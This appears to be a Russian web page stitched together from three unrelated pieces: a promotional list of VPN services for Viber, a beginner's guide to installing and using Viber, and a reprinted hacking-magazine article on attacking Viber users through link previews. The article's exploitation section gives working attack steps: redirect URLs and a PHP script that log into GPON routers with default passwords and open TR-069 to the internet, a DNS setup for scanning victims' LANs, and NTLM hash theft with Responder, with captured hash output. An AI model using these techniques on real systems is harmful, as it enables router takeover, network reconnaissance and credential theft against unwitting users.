VPN для Viber позволит вам оставаться на связи со своими родными и близкими даже в том случае, если мессенджер перестанет работать на территории вашей страны.
Множество прикольных стикеров
В Магазине стикеров Viber вы найдёте огромный выбор стикерпаков с нашими новыми персонажами. Загружайте и отправляйте стикеры и сделайте ваше общение еще интересней. Стикеры синхронизируются между мобильным устройством и компьютером.
Как работает VPN
Расшифровка аббревиатуры VPN на русском языке звучит как «виртуальная частная сеть». Говоря простыми словами, это приложение, способное изменить ваше реальное местоположение в интернете, давая доступ к заблокированным ресурсам.
Чтобы вы смогли пользоваться Viber, VPN перенаправляет весь трафик через виртуальные тоннели на сторонние серверы, находящиеся в других странах. Таким образом, ваш реальный IP-адрес изменяется на новый, принадлежащий иному государству. Благодаря этому вы можете открывать заблокированные сайты и приложения, в том числе Viber.
Как по Viber определить местоположение человека
Выбор ВПН для Вайбер
При выборе сервиса VPN нужно обращать внимание на те, что соответствуют данным критериям (если не всем, то хотя бы большей части):
- Быстрое подключение и переподключение при необходимости
- Отсутствие неожиданных разрывов соединения с сервером
- Широкий выбор доступных серверов
- Защита входящего и исходящего трафика (особенно актуально для Viber)
- Отсутствие сохранения логов
- Возможность скачать на разные устройства
- Постоянная поддержка приложения разработчиками
Лучшие VPN для Viber
- ExpressVPN. Одно из лучших приложений, которое отвечает всем перечисленным выше требованиям. Помимо этих преимуществ, оно обладает автоматической настройкой, чтобы не заставлять вас самостоятельно задавать параметры подключения, а также системой возврата денег в течение 30 дней.
- VPN Master. Пользователи Viber на iPhone или iPad наверняка оценят этот сервис VPN. Его уже скачали более 150 000 раз из магазина App Store, и это количество лишь продолжает расти.
- NordVPN. Пользователи смартфонов на Android будут рады данной альтернативе предыдущего приложения. Этот VPN отличается отсутствием каких-либо логов подключения, что не позволяет кому-либо узнать, какие ресурсы вы посещали во время работы VPN. Также здесь есть пробная трехдневная версия, которую можно скачать совершенно бесплатно.
- VyprVPN. Чтобы использовать Viber не только на мобильном устройстве, но и компьютере, скачайте эту программу, которая даст вам отличное соединение на любой платформе.
- Surfshark. Еще один сервис, не сохраняющий журнал соединений и отличающийся экономным использованием ресурсов системы.
- PrivateVPN. Используйте, чтобы получить возможность быстрого подключения к Viber из любого региона.
Как Скрыть ip адрес вайбер
Как зайти в Viber через VPN
Большинство современных VPN сервисов даже не требуют настройки, поэтому с ними быстро разберется любой пользователь. В разных программах могут быть свои особенности работы, но в целом алгоритм подключения всегда один и тот же:
- Выберите понравившийся вам VPN для Viber.
- Загрузите приложение из магазина на своем устройстве или других источников.
- Откройте скачанную программу и выберите сервер, к которому хотите подключиться.
- После установки соединения откройте Viber, чтобы продолжать использование мессенджера.
Если в работе VPN возникнут проблемы, обратитесь в техподдержку сервиса, чтобы их решить.
Количество загрузок: 113
Проверено! Вирусов и прочих угроз не обнаружено.
Что такое Вайбер
Viber или по-русски Вайбер – это программа, через которую можно бесплатно звонить и отправлять сообщения. В том числе через нее можно передавать фотографии, документы и другие файлы. Грубо говоря, это тот же самый Скайп, но в другой упаковке.
Сначала эта программа была доступна только для «умных» телефонов — они еще называются смартфоны. То есть таких, у которых есть какая-то операционная система: Android, iOS или Windows. Но потом появилась и компьютерная версия.
Примерно так выглядит Viber на телефоне:
А вот так – на компьютере или планшете:
Программа работает через интернет. То есть для ее функционирования нужно, чтобы устройство было подключено к сети.
Как установить Viber на телефон
Процесс стандартный: заходим в магазин приложений, через поиск находим и устанавливаем программу. Покажу на примере телефона с системой Андроид.
1 . Открываем значок Play Маркет
2 . В строке поиска (вверху) печатаем viber или вайбер и выбираем найденное приложение.
Итак, программа установлена, теперь ее нужно настроить.
Нажимаем «Продолжить», после чего приложение просит ввести свой номер мобильного. Код страны уже указан, поэтому нужно напечатать только код оператора и номер.
Если мой телефон в полном формате вот такой +7 (905) 111 22 33, то печатаю его так: 9051112233. Этот телефон я указал для примера. Использовать нужно свой настоящий номер, иначе ничего не получится.
На указанный телефон придет смс-сообщение с кодом, который вводим в окошко и нажимаем «Готово».
Далее, приложение попросит напечатать свое имя и добавить фото, но можно этого и не делать, а просто нажать «Продолжить». После этого программа откроется и ею уже можно начинать пользоваться.
А еще на экране телефона появится значок:
Через него как раз и нужно запускать Вайбер.
Как пользоваться Вайбером
При установке программа привязывается к номеру вашего телефона. А это означает, что любой человек, у которого есть ваш номер и тоже установлен Вайбер, сможет вам бесплатно позвонить через него или отправить сообщение.
Покажу на примере. В программе есть три вкладки: чаты, контакты и вызовы. Если приложение вы установили только что, то в чатах будет пусто.
Переходим в «Контакты» и первое, что видим, надпись «Нет средств» и кнопку «Пополнить». Но это не для нас — просто не обращайте на нее внимания.
Вот моя мама каждый раз, когда туда нажимает, начинает волноваться: «А вот у меня там написано, «нет средств». Что надо сделать?». И каждый раз я ей объясняю, что это не для нее написано – нужно просто не обращать внимания на это сообщение 🙂
Вайбер – бесплатная программа. Ничего там пополнять не нужно. Эта надпись для тех, кто пользуется Viber Out (об этой системе я расскажу в другой статье).
Опускаемся ниже – туда, где начинаются контакты. Здесь будут все номера, которые добавлены в ваш телефон. То есть все номера из справочника программа добавила в этот список.
Вот смотрите: люди, у которых тоже установлен Viber, помечены специальным значком. Это значит, что им можно в рамках системы бесплатно позвонить или отправить сообщение.
Они нам и интересны. Другим же, тем, кто НЕ отмечен таким значком, бесплатно позвонить и отправить сообщение нельзя.
Правда, есть такая штука как Viber Out, но это отдельная история, о которой я расскажу как-нибудь в другой раз.
Например, я хочу позвонить брату. Нахожу его в списке. Как видите, он отмечен значком программы, значит, с ним можно связаться.
Первое, на что нужно обратить внимание, это в сети ли человек. Если да, значит, он подключен к интернету и если ему позвонить, он сможет ответить на звонок. Для этого нажимаю кнопку «Бесплатный вызов».
Вызов проходит и если брат захочет, то ответит. Разговаривать с ним я буду точно так же, как по телефону, приложив аппарат к уху. А можно держать телефон в руке и говорить в нижнюю его часть.
Кроме того, можно включить видеосвязь. Но с этим, я думаю, вы и сами разберетесь 😉
Переписка в Вайбере
Переписка — одна из самых главных функций программы. Среди пользователей она даже популярнее, чем сами звонки. Ведь разговаривать не всегда удобно и не всегда хочется, а вот отправить короткое сообщение или забавную картинку – самое то. А можно отправить еще и фотку или видео.
Допустим, я недавно установил Вайбер и хочу отправить подруге сообщение. Значит, открываю программу, захожу во вкладку «Контакты» и выбираю ее номер из списка. Оказывается, она сейчас не в сети. Но это и не так важно, ведь когда она подключится к интернету, то сразу получит мое сообщение.
Нажимаю кнопку «Бесплатное сообщение».
Вот что открывается:
Нажимаю на нижнюю часть, туда, где написано «Написать сообщение…». Появляется клавиатура, через которую набираю текст. Когда всё готово, нажимаю на кнопку отправки.
Сообщение публикуется. Если под ним нет никакой отметки, значит, оно еще не доставлено до адресата. Такое бывает, когда человек не в сети.
А вот когда оно будет доставлено, то под ним появится соответствующая надпись.
Это значит, что сообщение пришло на телефон, но человек его еще не прочитал. Когда он его прочитает, надпись изменится на такую:
Если же нужно отправить что-то другое, например, фотографию, то сделать это можно через нижние кнопки. Вот эта кнопка 
добавляет фотку из галереи (когда она уже есть в памяти телефона). А по этой кнопке 
можно сделать новый снимок. Есть еще и такая кнопка 
– через нее можно отправить забавную картинку.
Подробно объяснять, как это все работает, не буду – просто потренируйтесь. Там действительно нет ничего сложного.
После того как вы отправите кому-то сообщение, вся ваша переписка с этим человеком будет находиться в программе во вкладке «Чаты». Это сделано для удобства, чтобы каждый раз не выискивать нужный номер в Контактах. То есть если вы зайдете в Чаты, то там будут все, кому вы отправляли сообщения.
Нужно просто щелкнуть по имени человека и прошлая переписка с ним откроется. Здесь же можно и отправить новое сообщение.
На заметку . Обратите внимание на кнопку со знаком плюс. Через нее можно быстро выбрать того, с кем у вас еще не было переписок. Или добавить новый номер — которого нет в справочнике телефона.
Список принятых и пропущенных вызовов
Все звонки, которые вы совершали через программу, будут отмечены в специальном журнале. Он показан во вкладке «Вызовы». Здесь же будут отмечены и те вызовы, которые вы не приняли.
Это что-то вроде журнала звонков в вашем телефоне. Но показываются там только те абоненты, которые звонили вам именно через программу Вайбер.
Источник: neumeka.ru
Viber как оружие: используем популярный мессенджер для атак на пользователя
С каждым днем все больше владельцев смартфонов отдают приоритет мобильным мессенджерам, популярный представитель которых — Viber, позволяющий удобно объединить переписку на разных устройствах. Неудивительно, что исследованию их безопасности в последнее время уделяется пристальное внимание. Думаешь, Viber полностью надежен и неспособен тебя подвести? Ну что ж, давай посмотрим, насколько это соответствует истине.
Маленький рисерч Viber
Не так давно стало известно об уязвимости в iMessage. Как обнаружил независимый исследователь Росс Маккиллоп (Ross McKillop), предварительный просмотр URL раскрывает данные об IP-адресе пользователя, версии ОС и другие данные об устройстве. Причина заключалась в том, что при построении превьюшки запросы отправлялись непосредственно с устройства. Таким образом, когда iMessage запрашивал данные о каком-либо сайте, то раскрывал адрес пользователя и сведения о его устройстве.
Более корректная архитектура мессенджера предполагает предварительное кеширование контента на своих серверах и дальнейшую загрузку уже оттуда, как это реализовано, например, в Facebook, Twitter и Skype. Давай разберемся, как строится preview по URL в Viber и какие последствия может иметь маленький недочет в проектировании ПО.
Кто принимал участие в исследовании
Для начала просто отправим сообщение, содержащее корректный URL картинки, размещенной на нашем сервере, например http://host/img.jpg , и посмотрим логи.
«HEAD /img.jpg HTTP/1.1» 200 0 «-» «Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) QtWebEngine/5.6.0 Chrome/45.0.2454.101 Safari/537.36» «GET /img.jpg HTTP/1.1» 200 45468 «-» «Dalvik/1.6.0 (Linux; U; Android 4.4.2; GT-N7100 Build/KOT49H)» «GET /img.jpg HTTP/1.1» 200 45468 «-» «Viber/6.5.3.266 CFNetwork/808.1.4 Darwin/16.1.0»
Как видим, iMessage не был исключением, и Viber аналогично скомпрометировал IP-адрес получателя сообщения (reciever_ip). Но что будет, если под видом картинки мы попробуем выполнить redirect получателя в произвольном направлении? Вернем код ответа сервера 301 и в HTTP-заголовках укажем поле Location: http://somehost.ru .
«HEAD /img.jpg HTTP/1.1» 302 0 «-» «Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) QtWebEngine/5.6.0 Chrome/45.0.2454.101 Safari/537.36»
Лог отличается от предыдущего отсутствием GET-запросов от отправителя и получателя сообщения. С чем это может быть связано? Попробуем в ответ на HEAD вернуть настоящий заголовок картинки, а для GET выполнить перенаправление:
«HEAD /img.jpg HTTP/1.0» 200 — «-» «Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) QtWebEngine/5.6.0 Chrome/45.0.2454.101 Safari/537.36» «GET /img.jpg HTTP/1.0» 302 — «-» «Dalvik/1.6.0 (Linux; U; Android 4.4.2; GT-N7100 Build/KOT49H)» «GET /img.jpg HTTP/1.0» 302 — «-» «Viber/6.5.3.266 CFNetwork/808.1.4 Darwin/16.1.0»
На этот раз Viber успешно перенаправил обоих участников переписки — это говорит о том, что Viber выполняет верификацию картинки с помощью начального HEAD-запроса. А теперь давай проведем эксперимент с cookie. Разместим на сервере простой скрипт для генерации картинки со значением из cookie, увеличивая его на единицу при каждом запросе:
imagejpeg($im, ‘temp.jpeg’); $size = filesize(‘temp.jpeg’); header(«Content-Type: image/jpeg»); header(«Content-Length: » . $size); imagejpeg($im); imagedestroy($im); ?>
В .htaccess добавим записи:
RewriteEngine on RewriteRule c_(d+).jpg$ cookie.php # чтобы избежать кеширования
Отправим два сообщения со ссылками на наш хост, например:
http://somehost.ru/c_08.jpg
http://somehost.ru/c_09.jpg
Другие статьи в выпуске:
Xakep #216. Копаем BitLocker
- Содержание выпуска
- Подписка на «Хакер» -60%
Как видно из скриншота, от сообщения к сообщению Viber собирает и хранит выданные ему cookies.
Особенности Windows-клиента Viber
А теперь заглянем в директорию Viber, обычно это C:UsersusernameAppDataLocalViber . Наличие файла Qt5WebEngine.dll , как и UserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) QtWebEngine/5.6.0 Chrome/45.0.2454.101 Safari/537.36 , который мы наблюдали при создании миниатюр, подсказывает, что используется Qt-модуль QtWebEngine . Надо сказать, что в большинстве Windows-версий популярных браузеров реализован механизм аутентификации с помощью NTLM, имеющий по умолчанию ограниченный список ресурсов, вход на которые выполняется автоматически.
NTLM-аутентификация
В Firefox разрешенные ресурсы задаются полем network.automatic-ntlm-auth.trusted-uris в редакторе настроек about:config . По умолчанию данный список пуст.
В Chrome и IE политика безопасности в отношении NTLM-аутентификации строится на основе настроек IE ( Tools > Internet Options > Security > Internet > User Authentication > Logon ). По умолчанию там задан параметр Automatic logon only in Intranet zone , разрешающий автологин только внутри интрасети.
Интересно, а какие настройки безопасности по умолчанию имеет QtWebEngine? Один из способов узнать это — создать тестовое приложение с этим же модулем, например используя среду Qt Designer для Windows. Перенаправим GET-запросы с сервера по URI /a_1.jpg на предварительно развернутую утилиту Responder, которая реализует цепочку ответов, необходимых для входа по NTLM. Параллельно запустим WireShark для анализа пакетов. Затем, используя встраиваемый компонент на основе QtWebEngine в Qt Designer, откроем a_1.jpg и посмотрим историю запросов в WireShark.
Цепочка запросов говорит об успешной работе механизма NTLM-аутентификации на произвольном интернет-ресурсе. Последний HTTP-запрос от клиента включает данные о пользователе Windows, в том числе имя пользователя и NTLMv2-хеш пароля. Сможем ли мы получить хеш пароля от Windows, отправив всего одно Viber-сообщение? Узнаем при эксплуатации.
Эксплуатация
Рассмотрим возможные сценарии атаки, используя то, что мы знаем о Viber.
IP disclosure
Для реализации атаки достаточно HTTP-сервера с корректной картинкой. При отправке через Viber сообщения со ссылкой на картинку на сервер будет выполнен GET-запрос от IP-адреса получателя сообщения.
Redirect to LAN
Предположим, нам известно, что интернет-провайдер атакуемого клиента Viber использует роутеры на GPON Home Gateway со стандартными паролями, но без выведения управления в WAN. Для перенастройки роутера необходимо выполнить вход, затем сохранить конфигурацию WAN-интерфейса. Нам уже известно, что Viber хранит cookie, благодаря чему после первого запроса аутентификации остальные выполнятся уже с идентификатором сессии. Отправим два редиректа.
http://192.168.1.1/GponForm/LoginForm?XWebPageName=indexpassword=admin
и сохранение WAN-настроек:
http://192.168.1.1/GponForm/wan_XForm?XWebPageName=wandelPubWifi=pubWifiPbit=hAction=3con_mode=0tr069=2vlan_enable=onp802.1=3ip_mode=1ipv6_pd_mode=2opt60_value=static_ip=static_gw=static_secdns=static_ipv6prefix=static_ipv6gw=static_ipv6secdns=
В результате имеем открытый TR-069 на WAN-интерфейсе клиентского роутера. PHP-скрипт для реализации редиректа выглядит следующим образом:
$step=isset($_GET[‘step’])?$_GET[‘step’]:’0′; switch ($step) < case ‘0’: header(‘Location: http://192.168.1.1/GponForm/LoginForm?XWebPageName=indexpassword=admin’); break; case ‘1’: header(‘Location: http://192.168.1.1/GponForm/wan_XForm?XWebPageName=wandelPubWifi=pubWifiPbit=hAction=3con_mode=0tr069=2vlan_enable=onp802.1=3ip_mode=1ipv6_pd_mode=2opt60_value=static_ip=static_gw=static_secdns=static_ipv6prefix=static_ipv6gw=static_ipv6secdns=’); break; >?>
LAN scan
Просканируем предполагаемую локальную сеть атакуемого пользователя. Для этого нам понадобится DNS-сервер с конфигурацией зоны для network.host, содержащей следующие записи:
network A 192.168.1.1 network A 192.168.1.2 network A 192.168.1.3 .. network A 192.168.1.255
Перенаправив пользователя на данный поддомен, клиент будет опрашивать DNS-сервер, пока не встретит отвечающий адрес, а мы, в свою очередь, узнаем, на каком IP он остановился. Если же перенаправить пользователя на http://network.host:port , мы можем аналогичным образом узнать, имеется ли среди заданного списка IP хост с данным открытым портом.
NTLM hashjacking
Этот вектор атаки актуален для Windows. Для удобного разбора пакетов NTLM-аутентификации нам поможет Responder. Запустим его на сервере, затем, как в предыдущих примерах, отправим сообщение со ссылкой на картинку, выполним redirect и перенаправим получателя на web-сервер Responder’а. В ответ на GET-запрос будет запрошена аутентификация с использованием NTLM-данных:
WWW-Authenticate: NTLM
Далее происходит обмен пакетами NTLMSSP_NEGOTIATE , NTLMSSP_CHALLENGE и NTLMSSP_AUTH , а в выводе Responder’а мы получаем данные пользователя, включая NTLMv2-хеш:
[HTTP] User-Agent : Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) QtWebEngine/5.6.0 Chrome/45.0.2454.101 Safari/537.36 [HTTP] User-Agent : Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) QtWebEngine/5.6.1 Chrome/45.0.2454.101 Safari/537.36 [HTTP] Sending NTLM authentication request to [HTTP] User-Agent : Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) QtWebEngine/5.6.1 Chrome/45.0.2454.101 Safari/537.36 [HTTP] GET request from: URL: /img.jpg [HTTP] Host : [HTTP] User-Agent : Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) QtWebEngine/5.6.1 Chrome/45.0.2454.101 Safari/537.36 [HTTP] NTLMv2 Client : [HTTP] NTLMv2 Username : USER [HTTP] NTLMv2 Hash : ::USER:1122334455667788:3F012F0ABC01E416AA9368ACC7891000:010100000000000080ABBB1267A6D201613532396BCD8EE891000000010002005320410041000100160053304B00410022005600BF00FAAAB3004B0016009400040023007300AD0062002E006C006F00630AA1006CC00300280023006500420076006400740032003000300033002E0073006D0062002E006C006F0064406100640005001250750055006A002B3065006300FF006A1062000000000000000000
Даже если пароль надежен, hashjacking в Viber может использоваться для Relay-атак на многочисленные сервисы с NTLM-аутентификацией.
Вместо заключения
Вот такие вот дела. Как видишь, этот мессенджер тоже уязвим и позволяет проводить довольно серьезные атаки.
Хорошей новостью для пользователей Viber станет то, что для проведения таких атак злоумышленник должен находиться в контакт-листе атакуемого. Плохая состоит в том, что ни один из векторов не требует активных действий со стороны цели: просмотрев сообщение, пользователь уже может подвергнуть себя риску. Так что будь начеку. Предупрежден — значит вооружен.
Источник: xakep.ru